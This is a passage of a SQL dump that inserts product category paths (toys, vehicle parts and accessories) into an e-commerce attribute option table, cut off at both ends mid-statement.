(5128, 5128, 0, 'Toys & Games > Toys > Flying Toys'),
(5129, 5129, 0, 'Toys & Games > Toys > Flying Toys > Air & Water Rockets'),
(5130, 5130, 0, 'Toys & Games > Toys > Flying Toys > Kites'),
(5131, 5131, 0, 'Toys & Games > Toys > Flying Toys > Toy Gliders'),
(5132, 5132, 0, 'Toys & Games > Toys > Flying Toys > Toy Parachutes'),
(5133, 5133, 0, 'Toys & Games > Toys > Musical Toys'),
(5134, 5134, 0, 'Toys & Games > Toys > Musical Toys > Toy Instruments'),
(5135, 5135, 0, 'Toys & Games > Toys > Play Vehicle Accessories'),
(5136, 5136, 0, 'Toys & Games > Toys > Play Vehicle Accessories > Toy Race Car & Track Accessories'),
(5137, 5137, 0, 'Toys & Games > Toys > Play Vehicle Accessories > Toy Train Accessories'),
(5138, 5138, 0, 'Toys & Games > Toys > Play Vehicles'),
(5139, 5139, 0, 'Toys & Games > Toys > Play Vehicles > Toy Airplanes'),
(5140, 5140, 0, 'Toys & Games > Toys > Play Vehicles > Toy Boats'),
(5141, 5141, 0, 'Toys & Games > Toys > Play Vehicles > Toy Cars'),
(5142, 5142, 0, 'Toys & Games > Toys > Play Vehicles > Toy Helicopters'),
(5143, 5143, 0, 'Toys & Games > Toys > Play Vehicles > Toy Motorcycles'),
(5144, 5144, 0, 'Toys & Games > Toys > Play Vehicles > Toy Race Car & Track Sets'),
(5145, 5145, 0, 'Toys & Games > Toys > Play Vehicles > Toy Spaceships'),
(5146, 5146, 0, 'Toys & Games > Toys > Play Vehicles > Toy Trains & Train Sets'),
(5147, 5147, 0, 'Toys & Games > Toys > Play Vehicles > Toy Trucks & Construction Vehicles'),
(5148, 5148, 0, 'Toys & Games > Toys > Pretend Play'),
(5149, 5149, 0, 'Toys & Games > Toys > Pretend Play > Play Money & Banking'),
(5150, 5150, 0, 'Toys & Games > Toys > Pretend Play > Pretend Electronics'),
(5151, 5151, 0, 'Toys & Games > Toys > Pretend Play > Pretend Housekeeping'),
(5152, 5152, 0, 'Toys & Games > Toys > Pretend Play > Pretend Lawn & Garden'),
(5153, 5153, 0, 'Toys & Games > Toys > Pretend Play > Pretend Professions & Role Playing'),
(5154, 5154, 0, 'Toys & Games > Toys > Pretend Play > Pretend Shopping & Grocery'),
(5155, 5155, 0, 'Toys & Games > Toys > Pretend Play > Toy Kitchens & Play Food'),
(5156, 5156, 0, 'Toys & Games > Toys > Pretend Play > Toy Tools'),
(5157, 5157, 0, 'Toys & Games > Toys > Remote Control Toy Accessories'),
(5158, 5158, 0, 'Toys & Games > Toys > Remote Control Toys'),
(5159, 5159, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Airships & Blimps'),
(5160, 5160, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Boats & Watercraft'),
(5161, 5161, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Cars & Trucks'),
(5162, 5162, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Helicopters'),
(5163, 5163, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Motorcycles'),
(5164, 5164, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Planes'),
(5165, 5165, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Robots'),
(5166, 5166, 0, 'Toys & Games > Toys > Remote Control Toys > Remote Control Tanks'),
(5167, 5167, 0, 'Toys & Games > Toys > Riding Toy Accessories'),
(5168, 5168, 0, 'Toys & Games > Toys > Riding Toys'),
(5169, 5169, 0, 'Toys & Games > Toys > Riding Toys > Electric Riding Vehicles'),
(5170, 5170, 0, 'Toys & Games > Toys > Riding Toys > Hobby Horses'),
(5171, 5171, 0, 'Toys & Games > Toys > Riding Toys > Push & Pedal Riding Vehicles'),
(5172, 5172, 0, 'Toys & Games > Toys > Riding Toys > Rocking & Spring Riding Toys'),
(5173, 5173, 0, 'Toys & Games > Toys > Riding Toys > Wagons'),
(5174, 5174, 0, 'Toys & Games > Toys > Robotic Toys'),
(5175, 5175, 0, 'Toys & Games > Toys > Sports Toy Accessories'),
(5176, 5176, 0, 'Toys & Games > Toys > Sports Toy Accessories > Fitness Toy Accessories'),
(5177, 5177, 0, 'Toys & Games > Toys > Sports Toy Accessories > Fitness Toy Accessories > Hula Hoop Accessories'),
(5178, 5178, 0, 'Toys & Games > Toys > Sports Toys'),
(5179, 5179, 0, 'Toys & Games > Toys > Sports Toys > Baseball Toys'),
(5180, 5180, 0, 'Toys & Games > Toys > Sports Toys > Basketball Toys'),
(5181, 5181, 0, 'Toys & Games > Toys > Sports Toys > Boomerangs'),
(5182, 5182, 0, 'Toys & Games > Toys > Sports Toys > Bowling Toys'),
(5183, 5183, 0, 'Toys & Games > Toys > Sports Toys > Fingerboards & Fingerboard Sets'),
(5184, 5184, 0, 'Toys & Games > Toys > Sports Toys > Fishing Toys'),
(5185, 5185, 0, 'Toys & Games > Toys > Sports Toys > Fitness Toys'),
(5186, 5186, 0, 'Toys & Games > Toys > Sports Toys > Fitness Toys > Hula Hoops'),
(5187, 5187, 0, 'Toys & Games > Toys > Sports Toys > Flying Discs'),
(5188, 5188, 0, 'Toys & Games > Toys > Sports Toys > Footbags'),
(5189, 5189, 0, 'Toys & Games > Toys > Sports Toys > Golf Toys'),
(5190, 5190, 0, 'Toys & Games > Toys > Sports Toys > Hockey Toys'),
(5191, 5191, 0, 'Toys & Games > Toys > Sports Toys > Playground Balls'),
(5192, 5192, 0, 'Toys & Games > Toys > Sports Toys > Racquet Sport Toys'),
(5193, 5193, 0, 'Toys & Games > Toys > Sports Toys > Toy Footballs'),
(5194, 5194, 0, 'Toys & Games > Toys > Toy Gift Baskets'),
(5195, 5195, 0, 'Toys & Games > Toys > Toy Weapon & Gadget Accessories'),
(5196, 5196, 0, 'Toys & Games > Toys > Toy Weapons & Gadgets'),
(5197, 5197, 0, 'Toys & Games > Toys > Visual Toys'),
(5198, 5198, 0, 'Toys & Games > Toys > Visual Toys > Kaleidoscopes'),
(5199, 5199, 0, 'Toys & Games > Toys > Visual Toys > Prisms'),
(5200, 5200, 0, 'Toys & Games > Toys > Wind-Up Toys'),
(5201, 5201, 0, 'Vehicles & Parts'),
(5202, 5202, 0, 'Vehicles & Parts > Vehicle Parts & Accessories'),
(5203, 5203, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Aircraft Parts & Accessories'),
(5204, 5204, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics'),
(5205, 5205, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle A/V Players & In-Dash Systems'),
(5206, 5206, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Amplifiers'),
(5207, 5207, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Cassette Adapters'),
(5208, 5208, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Cassette Players'),
(5209, 5209, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Equalizers & Crossovers'),
(5210, 5210, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Parking Cameras'),
(5211, 5211, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Speakerphones'),
(5212, 5212, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Speakers'),
(5213, 5213, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Subwoofers'),
(5214, 5214, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Electronics > Motor Vehicle Video Monitor Mounts'),
(5215, 5215, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts'),
(5216, 5216, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Braking'),
(5217, 5217, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Carpet & Upholstery'),
(5218, 5218, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Climate Control'),
(5219, 5219, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Controls'),
(5220, 5220, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Engine Oil Circulation'),
(5221, 5221, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Engine Parts'),
(5222, 5222, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Engines'),
(5223, 5223, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Exhaust'),
(5224, 5224, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Frame & Body Parts'),
(5225, 5225, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Fuel Systems'),
(5226, 5226, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Interior Fittings'),
(5227, 5227, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Lighting'),
(5228, 5228, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Mirrors'),
(5229, 5229, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Power & Electrical Systems'),
(5230, 5230, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Seating'),
(5231, 5231, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Sensors & Gauges'),
(5232, 5232, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Suspension Parts'),
(5233, 5233, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Towing'),
(5234, 5234, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Transmission & Drivetrain Parts'),
(5235, 5235, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems'),
(5236, 5236, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Rims & Wheels'),
(5237, 5237, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Rims & Wheels > Automotive Rims & Wheels'),
(5238, 5238, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Rims & Wheels > Motorcycle Rims & Wheels'),
(5239, 5239, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Rims & Wheels > Off-Road and All-Terrain Vehicle Rims & Wheels'),
(5240, 5240, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Tire Accessories'),
(5241, 5241, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Tires'),
(5242, 5242, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Tires > Automotive Tires'),
(5243, 5243, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Tires > Motorcycle Tires'),
(5244, 5244, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Tires > Off-Road and All-Terrain Vehicle Tires'),
(5245, 5245, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Wheel Systems > Motor Vehicle Wheel Parts'),
(5246, 5246, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Motor Vehicle Parts > Motor Vehicle Window Parts & Accessories'),
(5247, 5247, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor'),
(5248, 5248, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Portable Fuel Cans'),
(5249, 5249, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning'),
(5250, 5250, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Car Wash Brushes'),
(5251, 5251, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Car Wash Solutions');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(5252, 5252, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Vehicle Carpet & Upholstery Cleaners'),
(5253, 5253, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Vehicle Fuel Injection Cleaning Kits'),
(5254, 5254, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Vehicle Glass Cleaners'),
(5255, 5255, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Cleaning > Vehicle Waxes, Polishes & Protectants'),
(5256, 5256, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers'),
(5257, 5257, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Golf Cart Enclosures'),
(5258, 5258, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Motor Vehicle Windshield Covers'),
(5259, 5259, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Tonneau Covers'),
(5260, 5260, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Hardtops'),
(5261, 5261, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Soft Tops'),
(5262, 5262, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers'),
(5263, 5263, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers > Automotive Storage Covers'),
(5264, 5264, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers > Golf Cart Storage Covers'),
(5265, 5265, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers > Motorcycle Storage Covers'),
(5266, 5266, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers > Recreational Vehicle Storage Covers'),
(5267, 5267, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Covers > Vehicle Storage Covers > Watercraft Storage Covers'),
(5268, 5268, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor'),
(5269, 5269, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Bumper Stickers'),
(5270, 5270, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Air Fresheners'),
(5271, 5271, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Antenna Balls'),
(5272, 5272, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Dashboard Accessories'),
(5273, 5273, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Decals'),
(5274, 5274, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Decor Accessory Sets'),
(5275, 5275, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Display Flags'),
(5276, 5276, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Emblems & Hood Ornaments'),
(5277, 5277, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Hitch Covers'),
(5278, 5278, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle License Plate Covers'),
(5279, 5279, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle License Plate Frames'),
(5280, 5280, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle License Plate Mounts & Holders'),
(5281, 5281, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle License Plates'),
(5282, 5282, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Magnets'),
(5283, 5283, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Rear View Mirror Ornaments'),
(5284, 5284, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Shift Boots'),
(5285, 5285, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Shift Knobs'),
(5286, 5286, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Steering Wheel Covers'),
(5287, 5287, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Decor > Vehicle Wraps'),
(5288, 5288, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids'),
(5289, 5289, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Antifreeze'),
(5290, 5290, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Brake Fluid'),
(5291, 5291, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Cooling System Additives'),
(5292, 5292, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Engine Degreasers'),
(5293, 5293, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Fuel System Cleaners'),
(5294, 5294, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Greases'),
(5295, 5295, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Hydraulic Clutch Fluid'),
(5296, 5296, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Motor Oil'),
(5297, 5297, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Performance Additives'),
(5298, 5298, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Power Steering Fluid'),
(5299, 5299, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Transmission Fluid'),
(5300, 5300, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Fluids > Vehicle Windshield Fluid'),
(5301, 5301, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Paint'),
(5302, 5302, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Paint > Motor Vehicle Body Paint'),
(5303, 5303, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Paint > Motor Vehicle Brake Caliper Paint'),
(5304, 5304, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools'),
(5305, 5305, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Motor Vehicle Brake Service Kits'),
(5306, 5306, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Motor Vehicle Clutch Alignment & Removal Tools'),
(5307, 5307, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Battery Chargers'),
(5308, 5308, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Battery Testers'),
(5309, 5309, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Body Filler'),
(5310, 5310, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Diagnostic Scanners'),
(5311, 5311, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Jump Starters'),
(5312, 5312, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Jumper Cables'),
(5313, 5313, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Vehicle Tire Repair & Tire Changing Tools'),
(5314, 5314, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Maintenance, Care & Decor > Vehicle Repair & Specialty Tools > Windshield Repair Kits'),
(5315, 5315, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security'),
(5316, 5316, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear'),
(5317, 5317, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Chest & Back Protectors'),
(5318, 5318, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Elbow & Wrist Guards'),
(5319, 5319, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Gloves'),
(5320, 5320, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Goggles'),
(5321, 5321, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Hand Guards'),
(5322, 5322, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Helmet Parts & Accessories'),
(5323, 5323, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Helmets'),
(5324, 5324, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Kidney Belts'),
(5325, 5325, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Knee & Shin Guards'),
(5326, 5326, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Motorcycle Protective Gear > Motorcycle Neck Braces'),
(5327, 5327, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Off-Road & All-Terrain Vehicle Protective Gear'),
(5328, 5328, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Off-Road & All-Terrain Vehicle Protective Gear > ATV & UTV Bar Pads'),
(5329, 5329, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks'),
(5330, 5330, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Automotive Alarm Accessories'),
(5331, 5331, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Automotive Alarm Systems'),
(5332, 5332, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Motorcycle Alarms & Locks'),
(5333, 5333, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Door Locks & Parts'),
(5334, 5334, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Door Locks & Parts > Vehicle Door Lock Actuators'),
(5335, 5335, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Door Locks & Parts > Vehicle Door Lock Knobs'),
(5336, 5336, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Door Locks & Parts > Vehicle Door Locks & Locking Systems'),
(5337, 5337, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Hitch Locks'),
(5338, 5338, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Immobilizers'),
(5339, 5339, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Remote Keyless Systems'),
(5340, 5340, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Steering Wheel Locks'),
(5341, 5341, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Alarms & Locks > Vehicle Wheel Clamps'),
(5342, 5342, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment'),
(5343, 5343, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Car Window Nets'),
(5344, 5344, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Emergency Road Flares'),
(5345, 5345, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Motor Vehicle Airbag Parts'),
(5346, 5346, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Motor Vehicle Roll Cages & Bars'),
(5347, 5347, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Seat Belt Buckles'),
(5348, 5348, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Seat Belt Covers'),
(5349, 5349, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Seat Belt Straps'),
(5350, 5350, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Seat Belts'),
(5351, 5351, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Warning Whips'),
(5352, 5352, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Safety & Security > Vehicle Safety Equipment > Vehicle Wheel Chocks'),
(5353, 5353, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo'),
(5354, 5354, 0, 'Vehicles & Parts > Vehicle Parts & Accessories > Vehicle Storage & Cargo > Motor Vehicle Cargo Nets'),
